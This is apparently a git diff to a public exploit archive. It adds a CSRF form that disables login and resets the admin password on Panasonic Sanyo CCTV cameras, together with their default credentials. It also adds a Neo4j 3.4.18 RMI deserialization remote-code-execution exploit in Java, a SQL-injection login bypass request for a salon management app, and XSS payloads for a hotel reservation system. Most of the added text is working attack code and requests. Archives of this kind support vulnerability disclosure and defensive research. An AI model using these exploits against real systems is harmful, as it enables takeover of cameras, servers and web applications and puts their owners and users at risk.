diff --git a/exploits/hardware/webapps/50172.txt b/exploits/hardware/webapps/50172.txt
new file mode 100644
index 000000000..eb92f0af4
--- /dev/null
+++ b/exploits/hardware/webapps/50172.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF
+# Date: 13.07.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.panasonic.com
+
+<!--
+
+Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password
+
+
+Vendor: Panasonic Corporation | SANYO Electric Co., Ltd.
+Product web page: https://www.panasonic.com
+                  https://www.sanyo-av.com
+                  https://panasonic.net/sanyo/cs/index.html
+
+Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00),  SubVer: 1.01-00 (100528-00)
+                  Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00),  SubVer: 1.01-00 (100528-00)
+                  Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07),  SubVer: 1.01-00 (100528-00)
+                  Model: VCC-HD3300,  FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
+                  Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02),  SubVer: 1.01-00 (100528-00)
+                  Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00)
+
+Summary: SANYO network camera and network optional board with the
+latest H.264 compression technology provide the optimum surveillance
+applications with high quality real time moving image at low bandwidth.
+Simultaneous stream of H.264 and JPEG data and also COAX video out
+to provide flexible solution for digital and analogue combined system.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. These actions can be exploited to perform authentication
+detriment and account password change with administrative privileges if
+a logged-in user visits a malicious web site.
+
+Tested on: Embedded Linux
+           CGI
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5659
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php
+
+
+13.07.2021
+
+-->
+
+
+           [CSRF]
+[Anonymous user log in = ON]
+orororororororororororororor
+  [Change admin password]
+
+<html>
+  <body>
+    <form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST">
+      <input type="hidden" name="anonymous_sw" value="1" /> <!--Disable authentication-->
+      <input type="hidden" name="admin1_pw" value="Ztream0017" /> <!--Change admin password-->
+      <input type="hidden" name="admin2_pw" value="******" />
+      <input type="hidden" name="admin3_pw" value="******" />
+      <input type="hidden" name="operator_pw" value="********" />
+      <input type="hidden" name="guest_pw" value="*****" />
+      <input type="submit" value="Push" />
+    </form>
+  </body>
+</html>
+
+<!--
+[Defaults]
+admin:admin
+admin2:admin2
+admin3:admin3
+operator:operator
+operator2:operator2
+guest:guest
+-->
\ No newline at end of file
diff --git a/exploits/java/remote/50170.java b/exploits/java/remote/50170.java
new file mode 100644
index 000000000..9dca108be
--- /dev/null
+++ b/exploits/java/remote/50170.java
@@ -0,0 +1,85 @@
+# Exploit Title: Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)
+# Date: 7/30/21
+# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
+# Vendor Homepage: neo4j.com
+# Software Link: https://neo4j.com/download-thanks/?edition=community&release=3.4.18&flavour=unix
+# Version: 3.4.18
+# Tested on: Windows, Mac
+
+In older versions of Neo4j, when the shell server is enabled, RCE can be obtained via a Java deserialization exploit. In the ShellServer interface, a method setSessionVariable(Serializable paramSerializable, String paramString, Object paramObject) exists. Neo4j also has a dependency (rhino 1.7.9) with known RCE gadget chains. By crafting an object to abuse these gadget chains, one obtain RCE via the shell server.
+
+To create this from scratch using Java, you’ll need to modify the ysoserial library to include the payload found here https://github.com/mozilla/rhino/issues/520 (an update of the existing rhino gadget) as well as modify the ysoserial POM file to include the correct version of rhino. Rebuild ysoserial and include it on your exploit’s classpath. From there, you can use the ShellServer interface and associated code found in neo4j-shell-3.4.18.jar to make your client aware of the server’s method stubs. Now you should be able to call the setSessionVariable method from your exploit/client via RMI.
+In your exploit, use ysoserial to generate a payload as follows: Object payload = new RhinoGadget().getObject(COMMAND), and then call the setSessionVariable with the payload in the paramObject parameter. The other two parameters can be anything. This will cause the server to deserialize your payload, triggering the gadget chain, and running your command.
+It is worth noting that we chose to exploit this method and the paramObject parameter as this was the most direct, any method that takes in an Object (other than String or a primitave) is likely vulnerable as well.
+
+package runnable;
+
+import payloads.RhinoGadget;
+import sun.rmi.registry.RegistryImpl_Stub;
+
+import java.io.Serializable;
+import java.rmi.Naming;
+import org.neo4j.shell.ShellServer;
+
+public class ExploitB {
+
+    public static String COMMAND = "touch /tmp/test.txt";
+    public static String TARGET = "rmi://127.0.0.1:1337";
+    public static String TARGET_BINDING = "shell";
+
+    public static void main (String args[]) throws Exception {
+
+        boolean validBinding = checkBinding(TARGET_BINDING, TARGET);
+        if (!validBinding)
+        {
+            System.out.println("[-] No valid binding found, shell server may not be listening. Exiting");
+            System.exit(0);
+        }
+
+        System.out.println("[+] Found valid binding, proceeding to exploit");
+        ShellServer server = (ShellServer) Naming.lookup(TARGET + "/" + TARGET_BINDING);
+
+        Object payload = new RhinoGadget().getObject(COMMAND);
+
+        //Here server.shutdown may also be callable without auth, just in case the exploit fails and you just want to turn the thing off
+        try {
+            server.setSessionVariable(newClientId(), "anything_here", payload);
+        }
+        catch (Exception UnmarshalException ) {
+            System.out.println("[+] Caught an unmarshalled exception, this is expected.");
+        }
+        System.out.println("[+] Exploit completed");
+
+    }
+
+    /**
+     * Just a helper method to validate that the rmi binding we're looking for is present
+     * @param bindingToCheck the binding you'd like to check for
+     * @param targetToCheck the rmi registry to check against
+     * @return true if the binding is present, false if not
+     */
+    public static boolean checkBinding(String bindingToCheck, String targetToCheck) {
+
+        System.out.println("Trying to enumerate server bindings: ");
+        try {
+            RegistryImpl_Stub stub = (RegistryImpl_Stub) Naming.lookup(targetToCheck);
+
+            for (String element : stub.list()) {
+                System.out.println("Found binding: " + element);
+                if (element.equalsIgnoreCase(bindingToCheck))
+                    return true;
+            }
+            return  false;
+        }
+        catch (Exception ex)
+        {
+            return false;
+        }
+
+    }
+
+    public static Serializable newClientId() {
+        return Integer.valueOf(1);
+    }
+
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/50142.txt b/exploits/php/webapps/50142.txt
index 86f6564ec..7b371d69f 100644
--- a/exploits/php/webapps/50142.txt
+++ b/exploits/php/webapps/50142.txt
@@ -6,6 +6,7 @@
 # Version: prior to 9.4.0
 # Tested on: Windows 10, XAMPP
 # Reference: https://github.com/advisto/peel-shopping/issues/3
+# CVE: CVE-2021-37593
 
 
 ################
diff --git a/exploits/php/webapps/50169.txt b/exploits/php/webapps/50169.txt
new file mode 100644
index 000000000..5ecbe6ef2
--- /dev/null
+++ b/exploits/php/webapps/50169.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Men Salon Management System 1.0 - SQL Injection Authentication Bypass
+# Date: 2021-07-30
+# Exploit Author:  Akshay Khanna (ConfusedBot)
+# Vendor Homepage: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+*POC*
+
+Step 1 -  Go to URL http://localhost:8080/Men/Salon/Management/System/Project/msms/admin/index.php
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in the burp suite
+Step4 – Change the username to   admin ' or '1'='1'#
+Step 5 – Click forward and now you will be logged in as admin.
+
+REQUEST
+
+POST /Men/Salon/Management/System/Project/msms/admin/index.php HTTP/1.1
+Host: localhost:8080
+Content-Length: 67
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost:8080/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer:
+http://localhost:8080/Men%20Salon%20Management%20System%20Project/msms/admin/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=fmo6opiohab5jf02r13db3f459
+Connection: close
+
+username=admin+%27+or+%271%27%3D%271%27%23&password=a&login=Sign+In
\ No newline at end of file
diff --git a/exploits/php/webapps/50171.txt b/exploits/php/webapps/50171.txt
new file mode 100644
index 000000000..bc02dfecf
--- /dev/null
+++ b/exploits/php/webapps/50171.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)
+# Date: 2021-08-02
+# Exploit Author: Mohammad Koochaki
+# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/marimar.zip
+# Version: 1.0
+# Tested-on: Ubuntu 20.04.2 LTS, PHP 7.4.3
+
+### This application is prone to a cross-site scripting in the 'arrival' and 'departure' parameters at the following path:
+        - http://localhost/marimar/index.php?p=booking
+
+### Payload: "></div><script>alert("XSS-MSG")</script>
+
+### PoC:
+
+POST /marimar/index.php?p=booking HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 71
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/marimar/index.php?p=booking
+Cookie: PHPSESSID=9ck943m19rugu8d7q7d6mh6fnt
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+arrival="></div><script>alert("arrival")</script>&departure="></div><script>alert("departure")</script>&person=0&accomodation=0
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3df2ca2f5..ae27a1ed1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18519,6 +18519,7 @@ id,file,description,date,author,type,platform,port
 50136,exploits/cgi/remote/50136.py,"Aruba Instant (IAP) - Remote Code Execution",2021-07-15,"Aleph Security",remote,cgi,
 50145,exploits/hardware/remote/50145.txt,"KevinLAB BEMS 1.0 - Undocumented Backdoor Account",2021-07-21,LiquidWorm,remote,hardware,
 50160,exploits/hardware/remote/50160.txt,"Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE)",2021-07-28,"Ivan Nikolsky",remote,hardware,
+50170,exploits/java/remote/50170.java,"Neo4j 3.4.18 - RMI based Remote Code Execution (RCE)",2021-08-02,"Christopher Ellis",remote,java,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -44299,3 +44300,6 @@ id,file,description,date,author,type,platform,port
 50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",2021-07-29,securityforeveryone.com,webapps,php,
 50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)",2021-07-29,niebardzo,webapps,java,
 50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",2021-07-29,"J. Francisco Bolivar",webapps,multiple,
+50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",2021-08-02,"Akshay Khanna",webapps,php,
+50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",2021-08-02,"Mohammad Koochaki",webapps,php,
+50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",2021-08-02,LiquidWorm,webapps,hardware,